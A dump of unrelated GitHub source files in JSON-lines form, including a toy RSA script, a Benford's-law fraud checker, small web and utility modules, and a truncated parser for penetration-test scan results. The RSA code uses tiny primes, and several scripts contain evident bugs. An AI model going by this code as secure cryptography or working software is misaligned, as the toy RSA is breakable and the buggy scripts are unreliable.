TODO:\r\n#two big primes\r\n#n , phi(n)\r\n#e - random til acceptable\r\n#d = e^-1\r\n# convert text into intstring -> then int -> send into RSA system.\r\n\r\nimport math\r\nfrom random import randint\r\n\r\ndef main():\r\n blocksize = 2 # the larger the primes -> the larger the blocksize can be --> also the longer the calculations take.\r\n indata = \"hallåellerärduheltgoknödighej\"\r\n text = check_input_length(indata, blocksize)\r\n print(\"indata, plaintext:\", text)\r\n text_in_ints = text_convert(text, blocksize)\r\n print(text_in_ints)\r\n public_key, private_key = RSA(1021,1087)#ex\r\n cipher = encrypt(text_in_ints, public_key[0], public_key[1]) #ciphers are integers -> cannot control conversion to be z_28\r\n print(\"cipher:\", cipher)\r\n plaintext_in_ints = decrypt(cipher, private_key[0], private_key[1]) # doesnt work with blocksize larger than 1, text_in_ints =/= plaintext_in_ints\r\n print(plaintext_in_ints)\r\n plaintext = text_convert(plaintext_in_ints, blocksize, \"text\")\r\n print(\"Deciphered text:\", plaintext)\r\n\r\ndef text_convert(text, blocksize, type = \"int\"):\r\n if type == \"text\":\r\n alphabet = S_A()\r\n plaintext = \"\"\r\n if blocksize == 1:\r\n for value in text:\r\n plaintext += alphabet[value]\r\n else:\r\n for i in range(0, len(text)):\r\n count = 0\r\n blockstring = \"\"\r\n while count < blocksize:\r\n blockstring += str(text[i]).zfill(blocksize*2)\r\n count += 1\r\n count = 0\r\n # print(blockstring)\r\n while count < blocksize:\r\n plaintext += alphabet[int(blockstring[count*2:count*2+2])]\r\n count += 1\r\n return plaintext\r\n text_int = []\r\n count = 0\r\n while count < len(text):\r\n m = \"\" # blockstring first\r\n i = count\r\n while i < count+blocksize: #add m's number into a blockstring\r\n m += str(number_in_S_A(text[i])).zfill(2)\r\n i += 1\r\n m = int(m) #m -> integer\r\n text_int.append(m)\r\n count += blocksize\r\n return text_int\r\n\r\ndef check_input_length(text, blocksize):\r\n while len(text) % blocksize != 0:\r\n text += \"x\" #add filler\r\n return text\r\n\r\ndef number_in_S_A(letter_in):\r\n letter_in = letter_in.lower()\r\n alphabet = S_A()\r\n for index, letter in enumerate(alphabet):\r\n if letter == letter_in:\r\n return index\r\n return 22 # if it doesn't exist in {swedishalphabet}\\{w} -> x\r\n\r\ndef S_A():\r\n return \"abcdefghijklmnopqrstuvxyzåäö\"\r\n\r\ndef RSA(p, q): #only primes\r\n n = p*q\r\n phi = (p-1)*(q-1) #phi of n -> p and q are primes -> phi(n)=phi(p*q)=phi(p)*phi(q) = (p-1)*(q-1)\r\n e = 0\r\n d = 0\r\n while math.gcd(e,phi) != 1:\r\n e = randint(3,phi)\r\n d = pow(e, -1, phi)\r\n public_key = [n, e] # security is based on the fact that factorization of n takes a hella long time for large primes.\r\n private_key = [n, d]\r\n return public_key, private_key\r\n\r\ndef encrypt(text_in_ints, n, e):\r\n cipher = []\r\n for value in text_in_ints:\r\n cipher.append(pow(value, e, n)) #calculating...\r\n return cipher\r\n\r\ndef decrypt(cipher_in_ints, n, d):\r\n plaintext= []\r\n for value in cipher_in_ints:\r\n plaintext.append(pow(value, d, n)) #calculating...\r\n return plaintext\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Itggot-lukas-einlerlarsson/crypto","sub_path":"RSA_python.py","file_name":"RSA_python.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30751786983","text":"import os\nprint(os.getcwd())\ndef printMenu():\n print('''\n Customer and Sales System\\n \n 1. Load sales data\\n\n 2. Create Chart\\n\n Enter menu option (1-2) \n ''') # Gives the user two options one to load the sale data and two to create the chart \n \n# Variables \n\nuserInput = \"\"\nsaledata = \"1\"\ncreatechart = \"2\"\n\n\nif userInput == saledata: \n folder = os.getcwd()\n fileName = folder + \"\\\\sales.csv\" # Prints the csv file\n file = open(fileName, \"r\")\n print(file.read())\n file.close()\n \n salesData = [] #Creates empty list for sales data\nwith open(\"sales.csv\" , 'r') as file: #Opens csv file in read mode under the variable file \n lines = file.readlines()[1:] # read lines and store under lines variable. '[1: ]' skips first row\nfor line in lines: \n salesData.append(int(line.strip().split(',')[1])) #splits the second column, turns number in to integers, and stores under 'salesData' list \n\ndigit_counts = [0] * 9 #Generates 9 number list all starting at 0\nfor num in sales_data:\n first_digit = int(str(num)[0]) #Convert first digit of every number into integer using '(str(num0[0])'\ndigit_counts[first_digit-1] += 1\n\ndigit_percentages = [] #Empty list for percentages of digit occurences \nfor count in digit_counts:\n percentage = count/len(sales_data)*100 #divide count by total sales and mulitiply by 100\ndigit_percentages.append(percentage)\n\nfraud_threshold = (29, 32) #Sets range where fraud does not occur using tuple containing min and max integer \nif fraud_threshold[0] <= digit_percentages[0] <= fraud_threshold[1]:\n print(\"The data indicates that fraud likely did not occur.\")\nelse:\n print(\"The data indicates that fraud may have occurred.\") \n\n\n# chart\n\n if userInput == createchart: \n\n import matplotlib as plt\n\n plt.xlabel(\"Number\")\n plt.ylabel(\"Percent\")\n plt.show()\n\n folder = os.getcwd()\n fileName = folder + \"\\\\results.csv\" #Creates a new csv file when inputed \n file = open(fileName, \"w\")\n print(file.read())\n file.close()\n\n else:\n print(\"Please type in a valid option (A number from 1-2)\")\n\n\n\n\n\n","repo_name":"Nathantambourine/-Jeyabravin-Ethan-Thambirajah-Nathan-Benford-s-Law-Assignment","sub_path":"Benford's Law.py","file_name":"Benford's Law.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15214634809","text":"import pprint\n\n# 'PATH_INFO': '/hello',\n# 'QUERY_STRING': 'a=12&b=1&b=2',\n\ndef app(environ, start_response):\n pprint.pprint(environ)\n vars = environ['QUERY_STRING'].split(\"&\")\n data = '\\n'.join(vars) + '\\n'\n data = data.encode('utf-8')\n # data = b\"Hello, World!\\n\"\n start_response(\"200 OK\", [\n (\"Content-Type\", \"text/plain\"),\n# (\"Content-Length\", str(len(data)))\n ])\n\n return iter([data])\n","repo_name":"f4rx/StepicPythonWeb","sub_path":"1.9.11_gunicorn_app/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"75060493447","text":"\"\"\"Module containing the Simulation class.\"\"\"\n\nimport csv\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport networkx as nx\nfrom copy import deepcopy\n\nfrom .network import NetworkModel\n\n\nclass Simulation:\n \"\"\"\n Class for creating a network model simulation.\n\n Attributes\n ----------\n network_model(NetworkModel): The underlying model.\n T(int): The time since the start of the evacuation.\n evacuated(float): The number of people already evacuated.\n start(NetworkModel): The initial state of the model.\n simulation_results(list): The state of the model at different timesteps.\n evacuated_results(list): The number of people evacuated at different\n timesteps.\n \"\"\"\n\n def __init__(self,\n filepaths,\n limiting_flow_walkway=3.3,\n limiting_flow_rate_doorway=0.7,\n free_speed_walkway=1.25):\n \"\"\"\n Create an instance of the Simulation class.\n\n Parameters\n ----------\n filepaths(list): The list of filepaths for edge/node files.\n limiting_flow_walkway(float): The limiting flow in walkways.\n limiting_flow_rate_doorway(float): The limiting flow rate through\n doorways.\n free_speed_walkway(float): The free speed in walkways.\n \"\"\"\n self.network_model = NetworkModel()\n self.T = 0\n self.evacuated = 0\n for filepath in filepaths:\n self.network_model.add_graph_from_csv(filepath,\n limiting_flow_walkway,\n limiting_flow_rate_doorway,\n free_speed_walkway)\n\n def set_initial_populations(self, filepath):\n \"\"\"\n Set the initial populations of the network.\n\n Parameters\n ----------\n filepath(str): The filepath of the populations file.\n \"\"\"\n self.evacuated = 0\n with open(filepath) as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if len(row) == 2:\n num, pop = row\n self.network_model.nodes[num][\"population\"] = float(pop)\n\n def _increment_time(self):\n self.T += 1\n to_go = [\"8\"]\n while to_go:\n next = to_go.pop()\n in_edges = self.network_model.in_edges(next)\n out_edges = self.network_model.out_edges(next)\n if out_edges:\n to_dist = (min(self.network_model.nodes[next][\"population\"],\n self.network_model.nodes[next][\"flow_rate\"])\n / len(out_edges))\n for edge in out_edges:\n self.network_model.edges[edge][\"populations\"][0] += to_dist\n self.network_model.nodes[next][\"population\"] -= to_dist\n\n else:\n moving = min(self.network_model.nodes[next][\"population\"],\n self.network_model.nodes[next][\"flow_rate\"])\n self.evacuated += moving\n self.network_model.nodes[next][\"population\"] -= moving\n\n for edge in in_edges:\n if self.network_model.edges[edge][\"populations\"][-1] > 0:\n self.network_model.nodes[next][\"population\"] += \\\n self.network_model.edges[edge][\"populations\"][-1]\n self.network_model.edges[edge][\"populations\"][-1] = 0\n pop_len = len(self.network_model.edges[edge][\"populations\"])\n for i in range(pop_len - 1, 1, -1):\n self.network_model.edges[edge][\"populations\"][i] += \\\n self.network_model.edges[edge][\"populations\"][i - 1]\n self.network_model.edges[edge][\"populations\"][i - 1] = 0\n if self.network_model.edges[edge][\"populations\"][0] > 0:\n flow_rate = self.network_model.edges[edge][\"flow_rate\"]\n pop = self.network_model.edges[edge][\"populations\"][0]\n moving = min(flow_rate,\n pop)\n self.network_model.edges[edge][\"populations\"][1] += moving\n self.network_model.edges[edge][\"populations\"][0] -= moving\n to_go.append(edge[0])\n\n def _update(self, num, fixed_pos):\n self.ax.clear()\n graph = self.simulation_results[num]\n nodes = graph.nodes()\n edges = graph.edges()\n colors_nodes = [((graph.nodes[n]['population']\n / self._get_total_population())\n if n != \"8\"\n else ((graph.nodes[n][\"population\"]\n + self.evacuated_results[num])\n / self._get_total_population())\n for n in nodes)]\n colors_edges = [((sum(graph.edges[e][\"populations\"])\n / self._get_total_population())\n for e in edges)]\n pos = nx.spring_layout(graph, fixed=fixed_pos.keys(), pos=fixed_pos)\n nx.draw_networkx_edges(graph,\n pos,\n edgelist=edges,\n edge_color=colors_edges,\n width=3,\n edge_cmap=plt.cm.jet,\n edge_vmin=0,\n edge_vmax=1)\n nx.draw_networkx_nodes(graph,\n pos,\n nodelist=nodes,\n node_color=colors_nodes,\n node_size=100,\n cmap=plt.cm.jet,\n vmin=0,\n vmax=1)\n\n def _get_total_population(self):\n pop = (self.evacuated\n + sum([(self.network_model.nodes[node][\"population\"]\n for node in self.network_model.nodes())])\n + sum([(sum(self.network_model.edges[edge][\"populations\"])\n for edge in self.network_model.edges())]))\n return pop\n\n def animation(self, pos, filepath=None, show=False):\n \"\"\"\n Animate the evacuation simulation.\n\n Parameters\n ----------\n pos(dict): The list of positions of nodes.\n filepath(str): The filepath to save the animation in.\n show(bool): Whether to display the animation or not.\n \"\"\"\n self.simulate()\n print(\"Simulation DONE\")\n self.fig, self.ax = plt.subplots(figsize=(20, 15))\n frame_count = len(self.simulation_results)\n ani = matplotlib.animation.FuncAnimation(self.fig,\n lambda num: self._update(num,\n pos),\n frames=frame_count,\n interval=600,\n repeat=False)\n print(\"Animation DONE\")\n if filepath:\n ffmpeg_writer = matplotlib.animation.writers['ffmpeg']\n writer = ffmpeg_writer(fps=10,\n metadata=dict(artist=\"Harrison Mouat\"),\n bitrate=1800)\n ani.save(filepath, writer=writer)\n print(\"SAVED\")\n if show:\n plt.show()\n\n def simulate(self):\n \"\"\"Simulate the evacuation.\"\"\"\n self.start = self.network_model\n self.simulation_results = [deepcopy(self.network_model)]\n self.evacuated_results = [self.evacuated]\n while self.evacuated < self._get_total_population():\n self._increment_time()\n self.simulation_results.append(deepcopy(self.network_model))\n self.evacuated_results.append(self.evacuated)\n self.network_model = self.start\n print(f\"Time to evacuate: {self.T}\")\n print(f\"Total population: {self._get_total_population()}\")\n self.T = 0\n","repo_name":"Harry-icl/science-of-crowds","sub_path":"network_simulation/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28393033492","text":"import logging\nimport mistune\nimport urwid\n\nfrom hubtty import mywid\n\nclass Renderer:\n def __init__(self, app):\n self.log = logging.getLogger('hubtty.markdown')\n self.app = app\n\n def toUrwidMarkup(self, ast):\n text = []\n for element in ast:\n if element['type'] == 'text':\n text.append(element['text'])\n elif element['type'] == 'strong':\n text.append(('md-strong', self.toUrwidMarkup(element['children'])))\n elif element['type'] == 'emphasis':\n text.append(('md-emphasis', self.toUrwidMarkup(element['children'])))\n elif element['type'] == 'strikethrough':\n text.append(('md-strikethrough', self.toUrwidMarkup(element['children'])))\n elif element['type'] == 'heading':\n text.append(('md-heading', [\"#\" * element['level'], \" \", self.toUrwidMarkup(element['children']), \"\\n\"]))\n elif element['type'] == 'paragraph':\n # Add newline before paragraphs if needed\n if self.needsNewLine(text):\n text.append(\"\\n\")\n text.extend(self.toUrwidMarkup(element['children']))\n text.append(\"\\n\")\n elif element['type'] == 'newline':\n text.append(\"\\n\")\n elif element['type'] == 'thematic_break':\n text.append(('md-thematicbreak', \"\\n———————————————\\n\\n\"))\n elif element['type'] == 'block_quote':\n text.append(('md-blockquote', [\"| \", self.toUrwidMarkup(element['children'])]))\n elif element['type'] == 'block_code':\n info = element['info']\n if info == None:\n info = \"\"\n text.append(('md-blockcode', [\"```%s\\n\" % info, element['text'], \"```\\n\"]))\n elif element['type'] == 'image':\n # image - do nothing\n pass\n elif element['type'] == 'block_html':\n # HTML comments - do nothing\n pass\n elif element['type'] == 'codespan':\n text.append(('md-codespan', element['text']))\n elif element['type'] == 'list':\n if element['ordered']:\n idx = 1\n for li in element['children']:\n text.append(\" \" * element['level'] + \"%s. \" % idx)\n text.extend(self.toUrwidMarkup([li]))\n idx += 1\n else:\n for li in element['children']:\n text.append(\" \" * element['level'] + \"- \")\n text.extend(self.toUrwidMarkup([li]))\n elif element['type'] == 'list_item':\n text.extend(self.toUrwidMarkup(element['children']))\n elif element['type'] == 'block_text':\n text.extend(self.toUrwidMarkup(element['children']))\n text.append(\"\\n\")\n elif element['type'] == 'link':\n url = element['link']\n link_text = \"\"\n for child in element['children']:\n if child.get('text'):\n link_text += child['text']\n elif child.get('alt'):\n link_text += child['alt']\n link = mywid.Link(link_text, 'link', 'focused-link')\n urwid.connect_signal(link, 'selected',\n lambda link:self.app.openURL(url))\n text.append(link)\n else:\n self.log.warning(\"unknown element type: %s\" % element['type'])\n if 'children' in element:\n text.extend(self.toUrwidMarkup(element['children']))\n return text\n\n def needsNewLine(self, text):\n if len(text) == 0 or text == [\"\\n\"]:\n return False\n\n last_element = text[-1]\n second_to_last_element = \"\"\n if len(text) > 1:\n second_to_last_element = text[-2]\n\n while not isinstance(last_element, str):\n while isinstance(last_element, list):\n if len(last_element) > 1:\n second_to_last_element = last_element[-2]\n if len(last_element) > 0:\n last_element = last_element[-1]\n else:\n # Should not get empty list\n return False\n while isinstance(last_element, tuple):\n last_element = last_element[-1]\n # Just to make sure we don't enter an infinite loop\n if not (isinstance(last_element, list) or isinstance(last_element, str)):\n return False\n\n if last_element.endswith(\"\\n\\n\"):\n return False\n\n if last_element == \"\\n\":\n # Need to look in second to last element\n while not isinstance(second_to_last_element, str):\n while isinstance(second_to_last_element, list):\n if len(second_to_last_element) > 0:\n second_to_last_element = second_to_last_element[-1]\n else:\n # Should not get empty list\n return False\n while isinstance(second_to_last_element, tuple):\n second_to_last_element = second_to_last_element[-1]\n # Just to make sure we don't enter an infinite loop\n if not (isinstance(second_to_last_element, list) or isinstance(second_to_last_element, str)):\n return False\n\n if second_to_last_element.endswith(\"\\n\"):\n return False\n\n return True\n \n\n def render(self, text):\n md = mistune.create_markdown(renderer=mistune.AstRenderer(), plugins=['strikethrough'])\n # Misture returns newline for empty text, we don't want that\n if not text:\n return []\n ast = md(text)\n return self.toUrwidMarkup(ast)\n","repo_name":"hubtty/hubtty","sub_path":"hubtty/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"9318410268","text":"from key_binary_tree import KeyBinaryTree\n\ndef key_binary_tree_sort(list_, key=lambda x: x, reverse=False):\n\n class Tree(KeyBinaryTree):\n def to_list(self):\n list_ = []\n def handle(tree):\n list_.append(tree.root.key)\n self.inorder_traversal(self, handle)\n return list_\n\n list_ = list(map(lambda item: (key(item), item), list_))\n tree = Tree()\n for key, item in list_:\n tree.add(key, item)\n list_ = tree.to_list()\n return list_\n \n\n","repo_name":"sally-langshuang/algorithm","sub_path":"key_binary_tree_sort.py","file_name":"key_binary_tree_sort.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34377936383","text":"import sys\nsys.path.append('..')\nfrom test_framework.test_result import TestResult\nfrom test_framework.single_test import SingleTest\nfrom test_framework.compare import TestCompare\nfrom helpers.unit_converters.eps_telemetry_converter import *\nfrom helpers.unit_converters.convert_dict import *\nfrom helpers.unit_converters.eps_to_dict import * \n\n\nclass TestEPSA(SingleTest):\n def set_default_title_description(self):\n self.default_name = \"Test EPS A HK\"\n self.default_description = \"Basic EPS A housekeeping check\"\n\n def test_script(self):\n response_data = ControllerA.to_dict(self.obc.read_housekeeping_a())\n self.log.debug(\"OBC response: {}\".format(response_data))\n self.data = ConvertDict.convert(response_data, eps_a_telemetry_conversion)\n self.result = TestCompare.assert_within_closed_interval_dict_converted(self.data, self.kwargs['ranges'])\n\n\nclass TestEPSB(SingleTest):\n def set_default_title_description(self):\n self.default_name = \"Test EPS B HK\"\n self.default_description = \"Basic EPS B housekeeping check\"\n\n def test_script(self):\n response_data = ControllerB.to_dict(self.obc.read_housekeeping_b())\n self.log.debug(\"OBC response: {}\".format(response_data))\n self.data = ConvertDict.convert(response_data, eps_b_telemetry_conversion)\n self.result = TestCompare.assert_within_closed_interval_dict_converted(self.data, self.kwargs['ranges'])\n\n\n\n'''\nclass TestPV(SingleTest):\n def set_default_title_description(self):\n self.default_name = \"Test Photovoltaics\"\n self.default_description = \"Test Photovoltaic Modules, Photodiodes and Thermometers\"\n\n def test_script(self):\n response_data = ControllerA.to_dict(self.obc.read_housekeeping_a())\n self.log.debug(\"OBC response: {}\".format(response_data))\n self.data = ResultData(\"OK\", \"OK\", None)\n self.result = \n'''","repo_name":"PW-Sat2/PW-Sat2-EGSE","sub_path":"health_check_software/tests/test_eps.py","file_name":"test_eps.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"22870444656","text":"from importlib.machinery import SourceFileLoader\nfrom inspect import signature, isfunction\n\nclass Hook:\n\n # Common class for all the hooks that are going to be in the system\n # Initializing Hook object with the require parameters\n def __init__(self, name, description, path):\n self.name = name\n self.description = description\n self.path = path\n self.status = False\n self.loader = SourceFileLoader(\"ntps_hooks_(%s)\" % name, path)\n self.module = self.loader.load_module()\n self.inCollection = False\n self.execNum = 0\n self.validHook = False\n self.association = 0\n self.index = -1\n\n # This method has been tested\n # This method is in charge of deleting the Hook object from the system\n def removeHook(self):\n print(\"%s deleted from system\" % self.name)\n del self\n\n # This method would enabled the hook to be executed\n # Possible solution running hooks on their own threads\n # Need to fix\n def activateHook(self, pkt):\n if self.validHook is True and self.inCollection is True:\n print(\"Hook %s is enabled\" % self.name)\n self.status = True\n #tryHook = self.module.hook\n #self.runHook(tryHook)\n elif self.inCollection is True and self.validHook is False:\n print(\"Hook %s is not a valid Hook\" % self.name)\n else:\n print(\"Hook %s does not belong to a collection and can't be enabled!\" % self.name)\n\n def disableHook(self):\n print(\"%s is disabled\" % self.name)\n self.status = False\n\n def runHook(self, hookMethod, pkt):\n print(\"%s is running\" % self.name)\n if self.status is True:\n print(hookMethod(pkt))\n\n def checkHookProtocol(self):\n try:\n if isfunction(self.module.hook):\n sign = signature(self.module.hook)\n print(sign.parameters) # Debugging tool\n self.validHook = True\n return True\n\n except Exception:\n print(\"Error!\") # Hook Error Overlay here\n print(\"This hook does not follow protocol\\n\")\n\n self.removeHook()\n return False\n\n # This method has been tested\n # This method is a debugger tool to print the Hooks\n def printHook(self):\n print(\"The hook name is: \", self.name)\n print(\"Hook Description is: \", self.description)\n print(\"Hook Path: \", self.path)\n print(\"Status: \", self.status)\n print(\"In collection: \", self.inCollection)\n print(\"Execution Number: \", self.execNum)\n\n def RunFunctionalHooks(self, pkt):\n if self.status:\n hookmdl = self.module.hook\n self.runHook(hookmdl, pkt)\n","repo_name":"SETeamDante/ntps","sub_path":"HookSub/Hook.py","file_name":"Hook.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12399791723","text":"import webapp2\nfrom models import Variable\n\nclass GetHandler(webapp2.RequestHandler):\n def get(self):\n name = self.request.get('name')\n\n query = Variable.query(Variable.name == name)\n variable = query.get(projection=[Variable.value])\n\n self.response.headers['Content-Type'] = 'text/plain'\n if variable is None:\n self.response.write('None')\n else:\n self.response.write(variable.value)\n","repo_name":"slavik57/historical-dictionary","sub_path":"handlers/GetHandler.py","file_name":"GetHandler.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10014262157","text":"# coding=utf-8\nfrom django import template\nfrom django.utils import translation\n\nregister = template.Library()\n\n\ndef burmese_numerals(parser, token):\n nodelist = parser.parse(('end_burmese_numerals',))\n parser.delete_first_token()\n return UpperNode(nodelist)\n\n\nclass UpperNode(template.Node):\n def __init__(self, nodelist):\n self.nodelist = nodelist\n\n def render(self, context):\n output = self.nodelist.render(context)\n if translation.get_language() == \"my\":\n return convert_num_to_mm(output)\n else:\n return output\n\n\n@register.filter\ndef num_to_mm(value): # convert english numerals into myanmar numerals\n if translation.get_language() == \"my\":\n return convert_num_to_mm(value)\n else:\n return value\n\n\ndef convert_num_to_mm(value):\n if value:\n intab = u\"0123456789\"\n outtab = u\"၀၁၂၃၄၅၆၇၈၉\"\n intab = [ord(char) for char in intab]\n translate_table = dict(zip(intab, outtab))\n return unicode(value).translate(translate_table)\n else:\n return value\n\n\nregister.tag('burmese_numerals', burmese_numerals)\n","repo_name":"kostik/django_quiz_written","sub_path":"generator/templatetags/myanmar.py","file_name":"myanmar.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11510012353","text":"import numpy as np\r\n\r\nT = 0.01\r\n\r\n# 数值微分-加速度\r\ndef acceleration(list_v):\r\n a = []\r\n for i in range(len(list_v)):\r\n if i == 0:\r\n a.append(list_v[0])\r\n else:\r\n a.append(list_v[i] - list_v[i-1])\r\n return a\r\n\r\n# 数值积分-位移\r\ndef distance(list_v):\r\n d = []\r\n for i in range(len(list_v)):\r\n if i == 0:\r\n d.append(0.0)\r\n else:\r\n d.append(d[i-1] + (list_v[i] + list_v[i-1])/2*T)\r\n return d\r\n\r\n# 十次多项式拟合去势,差分,归一化\r\ndef chafen_qushi_guiyihua(ori_list):\r\n # 去势\r\n a = np.polyfit(range(len(ori_list)), ori_list[:], 10) # 用10次多项式拟合x,y数组\r\n b = np.poly1d(a) # 拟合完之后用这个函数来生成多项式对象\r\n c = b(range(len(ori_list))) # 生成多项式对象之后,就是获取x在这个多项式处的值\r\n qushi = [(ori_list[i] - c[i]) for i in range(len(ori_list))]\r\n # 差分\r\n cf = []\r\n for i in range(len(ori_list)):\r\n if i == len(ori_list) - 1:\r\n cf.append(ori_list[i] - c[i])\r\n else:\r\n cf.append((ori_list[i + 1] - c[i + 1]) - (ori_list[i] - c[i]))\r\n # 归一化\r\n mean = np.mean(np.array(cf))\r\n std = np.std(np.array(cf), ddof=1)\r\n nor = []\r\n for i in range(len(cf)):\r\n nor.append((cf[i] - mean) / std)\r\n return nor\r\n\r\n\r\n# 十次多项式拟合去势,归一化\r\ndef qushi10_guiyihua(ori_list):\r\n # 去势\r\n a = np.polyfit(range(len(ori_list)), ori_list[:], 10) # 用10次多项式拟合x,y数组\r\n b = np.poly1d(a) # 拟合完之后用这个函数来生成多项式对象\r\n c = b(range(len(ori_list))) # 生成多项式对象之后,就是获取x在这个多项式处的值\r\n qushi = [(ori_list[i] - c[i]) for i in range(len(ori_list))]\r\n # 归一化\r\n mean = np.mean(np.array(qushi))\r\n std = np.std(np.array(qushi), ddof=1)\r\n nor = []\r\n for i in range(len(qushi)):\r\n nor.append((qushi[i] - mean) / std)\r\n return nor\r\n\r\n\r\n# 均值去势,归一化\r\ndef qushi_mean_guiyihua(ori_list):\r\n # 去势\r\n mean = np.mean(np.array(ori_list))\r\n qushi = [(ori_list[i] - mean) for i in range(len(ori_list))]\r\n # 归一化\r\n mean = np.mean(np.array(qushi))\r\n std = np.std(np.array(qushi), ddof=1)\r\n nor = []\r\n for i in range(len(qushi)):\r\n nor.append((qushi[i] - mean) / std)\r\n return nor\r\n\r\n\r\n# 均值去势,scalesize\r\ndef qushi_mean_scalesize(ori_list):\r\n # 去势\r\n mean = np.mean(np.array(ori_list))\r\n qushi = [(ori_list[i] - mean) for i in range(len(ori_list))]\r\n # scalesize\r\n scalesize = 1e-5\r\n scale = [(qushi[i] * scalesize) for i in range(len(ori_list))]\r\n return scale\r\n\r\n\r\ndef detrend_normalization_max(ori_list):\r\n # 去势\r\n a = np.polyfit(range(len(ori_list)), ori_list[:], 10) # 用10次多项式拟合x,y数组\r\n b = np.poly1d(a) # 拟合完之后用这个函数来生成多项式对象\r\n c = b(range(len(ori_list))) # 生成多项式对象之后,就是获取x在这个多项式处的值\r\n qushi = [(ori_list[i] - c[i]) for i in range(len(ori_list))]\r\n # 归一化——最大值\r\n max_value = max([abs(qushi[i]) for i in range(len(qushi))])\r\n nor = [(qushi[i] / max_value) for i in range(len(qushi))]\r\n return nor","repo_name":"chf790301/TNCNN","sub_path":"waveforms_processing.py","file_name":"waveforms_processing.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2826872585","text":"import string\n\nclass Solution:\n def uniqueMorseRepresentations(self, words: List[str]) -> int:\n unique = set()\n morse = [\".-\",\"-...\",\"-.-.\",\"-..\",\".\",\"..-.\",\"--.\",\"....\",\"..\",\".---\",\"-.-\",\".-..\",\"--\",\"-.\",\"---\",\".--.\",\"--.-\",\".-.\",\"...\",\"-\",\"..-\",\"...-\",\".--\",\"-..-\",\n \"-.--\",\"--..\"]\n letters = list(string.ascii_lowercase)\n for word in words:\n transform = ''\n for s in word:\n transform = transform + morse[letters.index(s)]\n unique.add(transform)\n # print(letters.index('g'))\n return len(unique)","repo_name":"manjurulhoque/problem-solving","sub_path":"Leetcode/unique-morse-code-words.py","file_name":"unique-morse-code-words.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8397332749","text":"from jutsu.logger import logging # noqa\nfrom jutsu.config import Config, get_version # noqa\nfrom jutsu.core import ( # noqa\n Sedex,\n filters,\n Message,\n get_collection,\n pool\n)\n\nsedex = Sedex() # sedex is the client name\n","repo_name":"ashwinstr/sedex-dedex","sub_path":"jutsu/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12134576550","text":"from typing import List\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n track = {}\n for item in nums:\n if item in track:\n return True\n track[item] = True\n return False\n\nprint(Solution().containsDuplicate([1,2,3,4,1]))","repo_name":"sakshampuri/Leetcode","sub_path":"2. contains-duplicate.py","file_name":"2. contains-duplicate.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42739091412","text":"import os\nimport re\nimport logging\n\n\nlogging.basicConfig(level=logging.DEBUG)\n\ndef checks():\n # Checking to see if the expected directories are found\n logging.debug(\"Checking directories for files\")\n reportDir = os.listdir(\"report\")\n exploitDir = os.listdir(\"exploit\")\n lootDir = os.listdir(\"loot\")\n scansDir = os.listdir(\"scans\")\n\n # Print raw ls\n logging.debug(\"\\n\\nReport: {}\\nExploit: {}\\nLoot: {}\\nScans: {}\".format(reportDir, exploitDir, lootDir, scansDir))\n\n\n if reportDir:\n logging.info(\"Report has content\")\n logging.info(\"Please note, there aren't any command assosiated with this folder yet\")\n else:\n pass\n\n if exploitDir:\n logging.info(\"Exploit has content\")\n logging.info(\"Please note, there aren't any command assosiated with this folder yet\")\n else:\n pass\n\n if lootDir:\n logging.info(\"Loot has content\")\n logging.info(\"Please note, there aren't any command assosiated with this folder yet\")\n else:\n pass\n\n if scansDir:\n logging.info(\"Scans has content\")\n scans(scansDir)\n else:\n pass\n\ndef scans(scansDir):\n logging.info(\"Entering scans directory\")\n logging.debug(scansDir)\n \n # Variables for information\n versionsAll = {}\n feroxbusterAll = {}\n commentAll = []\n robot = False\n\n if \"_full_tcp_nmap.txt\" in scansDir:\n print(\"\\n\\n\")\n logging.info(\"Scanning _full_tcp_nmap.txt for versions\\n\")\n f = open(\"scans/_full_tcp_nmap.txt\", \"r\")\n file = f.readlines()\n for line in file:\n # logging.debug(line)\n\n # Grab Port, service running, and version\n versions = re.findall(\"(\\d+)\\/.+?\\s+\\w+\\s+(\\w+)\\s+[a-z-A-Z]+\\s+(.+)\\n\",line)\n if versions:\n # logging.debug(versions)\n versionsAll[versions[0][0]] = {\"port\":versions[0][0],\"service\":versions[0][1],\"version\":versions[0][2]}\n logging.debug(versions)\n f.close()\n\n for things 